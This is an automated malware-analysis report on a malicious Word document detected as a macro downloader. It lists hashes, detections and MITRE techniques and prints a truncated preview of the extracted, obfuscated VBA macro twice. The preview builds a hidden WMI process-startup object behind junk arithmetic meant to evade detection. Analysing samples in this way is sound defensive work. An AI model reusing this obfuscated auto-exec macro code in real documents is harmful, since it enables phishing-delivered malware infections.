Office (OLE) malware analysis — malicious · e0d6ca74ff50043d

MALICIOUS

Office (OLE)

305.1 KB Created: 2019-02-19 20:29:00 Authoring application: Microsoft Office Word First seen: 2019-02-26

MD5: fee627990c72491ee75870bf286bb7ad SHA-1: e1762cf16f83b3b7017a1350b2c9a92775592e89 SHA-256: e0d6ca74ff50043d8febeeebdedd1c98a8845306960647554810f397d32f0a68

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses obfuscated code and calls GetObject, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Downloader.00536d-6862966-0' strongly suggests this document is a downloader for further malicious payloads. The presence of a VBA macro and its likely function as a downloader points to a spearphishing attachment delivery method.

Heuristics 7

ClamAV: Doc.Downloader.00536d-6862966-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6862966-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 55392 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	55392 bytes
SHA-256: `0550af58b9103394042b414eb21ac33c67c332ef03c6c74510a4ccc6a976115a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "X85417_" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "D_03_5" Function i_730465() If E41_095 <> d_76509 Then z_43_9 = 130863235 + CSng(840541501) * 850022055 * ChrB(615223107) * (h49_22_ / CDbl(147515605 + CBool(A659__ - Int(676909013 / d_2__4_ * 340996018 / Cos(r_011_9_)))) - (c909__ + Oct(901211603) + 883599116 / 325923667)) End If If i6143_6 <> h33__13 Then P_51_323 = 840532279 + CSng(87393782) * 721210847 * ChrB(631122044) * (W62_9272 / CDbl(956603762 + CBool(a___4395 - Int(886876212 / S89_2_2 * 277982380 / Cos(M6_6_18_)))) - (A_5564 + Oct(217531508) + 589271794 / 906727470)) End If If N242_65 <> b933474 Then p48_4802 = 441996626 + CSng(590772287) * 165264288 * ChrB(571197179) * (k__88_ / CDbl(47600158 + CBool(C185_7 - Int(880660109 / f2__17_0 * 429453048 / Cos(l0_06754)))) - (X__47__3 + Oct(737925077) + 589574350 / 561336517)) End If If i14_86_ <> u27_1_9 Then H3___633 = 254867046 + CSng(416848932) * 641652396 * ChrB(480501352) * (B0405__8 / CDbl(217858241 + CBool(B12338_ - Int(961402893 / j5_4__ * 366644712 / Cos(i_7462_)))) - (I39__2 + Oct(769064779) + 410567726 / 80929509)) End If If J_01__7 <> T15682 Then i4___0 = 36795034 + CSng(359122723) * 589451975 * ChrB(950989683) * (n46720 / CDbl(748742720 + CBool(P_198_0 - Int(901105834 / U97_0065 * 68292996 / Cos(G_30629_)))) - (T4965_55 + Oct(915821532) + 341680720 / 458016889)) End If If F5_9686 <> F9_2_2__ Then o332_9 = 817715664 + CSng(847558423) * 3988265 * ChrB(752115412) * (U09893_1 / CDbl(165712882 + CBool(O37915 - Int(144560744 / T885_44 * 4898321 / Cos(V_223376)))) - (w8393__ + Oct(229460174) + 35400180 / 766124744)) End If If l_7439 <> z953468_ Then F767_01 = 63723581 + CSng(308453595) * 481895254 * ChrB(86899840) * (d502___ / CDbl(913320070 + CBool(i2760_ - Int(352818717 / K07__4__ * 204883602 / Cos(i_9___)))) - (j398_6 + Oct(707055774) + 385407223 / 336890248)) End If End Function Function H01_633(t_18__7_, z333_2) On Error Resume Next If f35_08__ <> s39552 Then d0_305_ = 333764498 + CSng(546080739) * 155925477 * ChrB(467041407) * (F59___96 / CDbl(778024666 + CBool(Z2____08 - Int(447103720 / t_77116_ * 699953694 / Cos(f___764)))) - (p_3085 + Oct(900547614) + 614322087 / 691184905)) End If If O5_22653 <> I0437_2 Then R00_5__ = 265439246 + CSng(22853566) * 668823883 * ChrB(931525609) * (l371_23 / CDbl(744723803 + CBool(A1__9_1 - Int(834765491 / m_1997 * 364388892 / Cos(Q837__)))) - (W1_79130 + Oct(705935521) + 565451600 / 852686519)) End If If N_745_ <> L__954_ Then j4952430 = 676791271 + CSng(78581075) * 729320063 * ChrB(242167125) * (V105___ / CDbl(612964186 + CBool(s1_27_9 - Int(454705114 / u1_030 * 287900680 / Cos(t_60379)))) - (o_116171 + Oct(366281032) + 89846832 / 176526514)) End If Set B_97__5 = GetObject((i66_77 + "winmgm" + A_14283) + (T45____0 + "ts:Win" + l3_5394_) + "32_Proce" + "ssStartup") If q7__487 <> N940__0 Then R30422_ = 804853718 + CSng(199634731) * 424256448 * ChrB(918190968) * (j39_159 / CDbl(91484157 + CBool(f2042_ - Int(502028593 / T_82_85_ * 38943615 / Cos(B98__12)))) - (S74__237 + Oct(856429675) + 830395124 / 41156062)) End If If f_815_ <> W4__07 Then T770835 = 507575691 + CSng(899767250) * 571779514 * ChrB(938940833) * (Y9__9416 / CDbl(56134707 + CBool(W4_9115 - Int(470714304 / h8___7 * 484559743 / Cos(n_25_0)))) - (F4_351 + Oct(35186367) + 214135549 / 256163935)) End If If D8___7_ <> w9557_90 Then H52_8_2 = 975827306 + CSng(441955126) * 638573321 * ChrB(813169436) * (X19_827 / CDbl(291253534 + CBool(d24954 - Int(988112802 / A_91_86_ * 664287035 / Cos(W2_3_5_)))) - (f24228 + Oct(883720840) + 298256732 / 287846563)) End If B_97__5.ShowWindow = 528679 - 528679 If X4_95_51 <> D9_1893_ Then j1_5_93_ = 642779728 + CSng(311917796) * 117625815 * ChrB(788595687) * (P_594_ / CDbl(716905177 + CBool(X__571 - Int ... (truncated)

SHA-256: 0550af58b9103394042b414eb21ac33c67c332ef03c6c74510a4ccc6a976115a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "X85417_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "D_03_5"
Function i_730465()
   If E41_095 <> d_76509 Then
z_43_9 = 130863235 + CSng(840541501) * 850022055 * ChrB(615223107) * (h49_22_ / CDbl(147515605 + CBool(A659__ - Int(676909013 / d_2__4_ * 340996018 / Cos(r_011_9_)))) - (c909__ + Oct(901211603) + 883599116 / 325923667))
End If
   If i6143_6 <> h33__13 Then
P_51_323 = 840532279 + CSng(87393782) * 721210847 * ChrB(631122044) * (W62_9272 / CDbl(956603762 + CBool(a___4395 - Int(886876212 / S89_2_2 * 277982380 / Cos(M6_6_18_)))) - (A_5564 + Oct(217531508) + 589271794 / 906727470))
End If
   If N242_65 <> b933474 Then
p48_4802 = 441996626 + CSng(590772287) * 165264288 * ChrB(571197179) * (k__88_ / CDbl(47600158 + CBool(C185_7 - Int(880660109 / f2__17_0 * 429453048 / Cos(l0_06754)))) - (X__47__3 + Oct(737925077) + 589574350 / 561336517))
End If
   If i14_86_ <> u27_1_9 Then
H3___633 = 254867046 + CSng(416848932) * 641652396 * ChrB(480501352) * (B0405__8 / CDbl(217858241 + CBool(B12338_ - Int(961402893 / j5_4__ * 366644712 / Cos(i_7462_)))) - (I39__2 + Oct(769064779) + 410567726 / 80929509))
End If
   If J_01__7 <> T15682 Then
i4___0 = 36795034 + CSng(359122723) * 589451975 * ChrB(950989683) * (n46720 / CDbl(748742720 + CBool(P_198_0 - Int(901105834 / U97_0065 * 68292996 / Cos(G_30629_)))) - (T4965_55 + Oct(915821532) + 341680720 / 458016889))
End If
   If F5_9686 <> F9_2_2__ Then
o332_9 = 817715664 + CSng(847558423) * 3988265 * ChrB(752115412) * (U09893_1 / CDbl(165712882 + CBool(O37915 - Int(144560744 / T885_44 * 4898321 / Cos(V_223376)))) - (w8393__ + Oct(229460174) + 35400180 / 766124744))
End If
   If l_7439 <> z953468_ Then
F767_01 = 63723581 + CSng(308453595) * 481895254 * ChrB(86899840) * (d502___ / CDbl(913320070 + CBool(i2760_ - Int(352818717 / K07__4__ * 204883602 / Cos(i_9___)))) - (j398_6 + Oct(707055774) + 385407223 / 336890248))
End If
End Function
Function H01_633(t_18__7_, z333_2)
On Error Resume Next
   If f35_08__ <> s39552 Then
d0_305_ = 333764498 + CSng(546080739) * 155925477 * ChrB(467041407) * (F59___96 / CDbl(778024666 + CBool(Z2____08 - Int(447103720 / t_77116_ * 699953694 / Cos(f___764)))) - (p_3085 + Oct(900547614) + 614322087 / 691184905))
End If
   If O5_22653 <> I0437_2 Then
R00_5__ = 265439246 + CSng(22853566) * 668823883 * ChrB(931525609) * (l371_23 / CDbl(744723803 + CBool(A1__9_1 - Int(834765491 / m_1997 * 364388892 / Cos(Q837__)))) - (W1_79130 + Oct(705935521) + 565451600 / 852686519))
End If
   If N_745_ <> L__954_ Then
j4952430 = 676791271 + CSng(78581075) * 729320063 * ChrB(242167125) * (V105___ / CDbl(612964186 + CBool(s1_27_9 - Int(454705114 / u1_030 * 287900680 / Cos(t_60379)))) - (o_116171 + Oct(366281032) + 89846832 / 176526514))
End If
Set B_97__5 = GetObject((i66_77 + "winmgm" + A_14283) + (T45____0 + "ts:Win" + l3_5394_) + "32_Proce" + "ssStartup")
   If q7__487 <> N940__0 Then
R30422_ = 804853718 + CSng(199634731) * 424256448 * ChrB(918190968) * (j39_159 / CDbl(91484157 + CBool(f2042_ - Int(502028593 / T_82_85_ * 38943615 / Cos(B98__12)))) - (S74__237 + Oct(856429675) + 830395124 / 41156062))
End If
   If f_815_ <> W4__07 Then
T770835 = 507575691 + CSng(899767250) * 571779514 * ChrB(938940833) * (Y9__9416 / CDbl(56134707 + CBool(W4_9115 - Int(470714304 / h8___7 * 484559743 / Cos(n_25_0)))) - (F4_351 + Oct(35186367) + 214135549 / 256163935))
End If
   If D8___7_ <> w9557_90 Then
H52_8_2 = 975827306 + CSng(441955126) * 638573321 * ChrB(813169436) * (X19_827 / CDbl(291253534 + CBool(d24954 - Int(988112802 / A_91_86_ * 664287035 / Cos(W2_3_5_)))) - (f24228 + Oct(883720840) + 298256732 / 287846563))
End If
B_97__5.ShowWindow = 528679 - 528679
   If X4_95_51 <> D9_1893_ Then
j1_5_93_ = 642779728 + CSng(311917796) * 117625815 * ChrB(788595687) * (P_594_ / CDbl(716905177 + CBool(X__571 - Int
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.